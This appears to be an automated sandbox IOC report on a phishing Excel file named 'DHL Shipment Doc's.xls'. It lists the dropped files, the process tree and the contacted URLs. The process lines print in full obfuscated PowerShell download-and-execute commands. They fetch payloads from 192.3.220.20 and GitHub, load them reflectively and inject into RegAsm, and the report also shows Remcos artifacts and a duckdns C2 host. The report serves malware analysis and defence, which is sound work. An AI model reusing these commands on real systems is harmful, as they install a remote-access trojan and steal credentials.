IOC Report
DHL Shipment Doc's.xls

loading gif

Files

File Path
Type
Category
Malicious
DHL Shipment Doc's.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 4 07:17:07 2024, Security: 1
initial sample
 malicious
C:\ProgramData\remcos\logs.dat
data
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Newprojectupdatedwithmegreat[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
 malicious
C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\Desktop\DHL Shipment Doc's.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 4 10:56:11 2024, Security: 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\picturewithgreatdayseverythinggood[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\518B3A84.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\544690B5.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86EA7732.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB986E9E.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4A80E10.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E947F98B.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (368)
dropped
C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\00kppfao\CSC26532048CBB457996C7A8C029DD268B.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\35j04mdu.42v.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\41e2cg05.yvw.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\43se5esv.b2r.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RESB349.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 4 09:56:02 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESFA28.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 4 09:56:20 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\bhvED5C.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x04bd0707, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\ezp25kbp.ts2.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\iww0kcsz.lnx.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\kfu0yovt.lav.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\o4i2ipv3.fqn.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\oehdq25e.ia3.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\qjwmez35\CSC8672896636494697B648CFD8C23C5D6C.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (368)
dropped
C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\rprymsh1.okw.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\t0qzf3n5.vo5.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\vgf1io1v.nn3.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\znzc34mr.4fy.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF8432329D89E5CFD2.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF962B97E296CF0813.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFF4645D8668BE566D.TMP
data
dropped
C:\Users\user\Desktop\D5230000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 4 10:56:11 2024, Security: 1
dropped
C:\Users\user\Desktop\D5230000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 36 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mhhfqkiqxvmvfmtfcdv"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjmxrdtjldezpaqjtnqsed"
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.cmdline"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB349.tmp" "c:\Users\user\AppData\Local\Temp\00kppfao\CSC26532048CBB457996C7A8C029DD268B.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA28.tmp" "c:\Users\user\AppData\Local\Temp\qjwmez35\CSC8672896636494697B648CFD8C23C5D6C.TMP"
There are 14 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIF
192.3.220.20
 malicious
http://192.3.220.20/97/RFGBVV.txt
192.3.220.20
 malicious
http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta
192.3.220.20
 malicious
idabo.duckdns.org
malicious
https://raw.gi
unknown
 malicious
http://b.scorecardresearch.com/beacon.js
unknown
http://192.3.220.20
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
http://www.nirsoft.netX
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
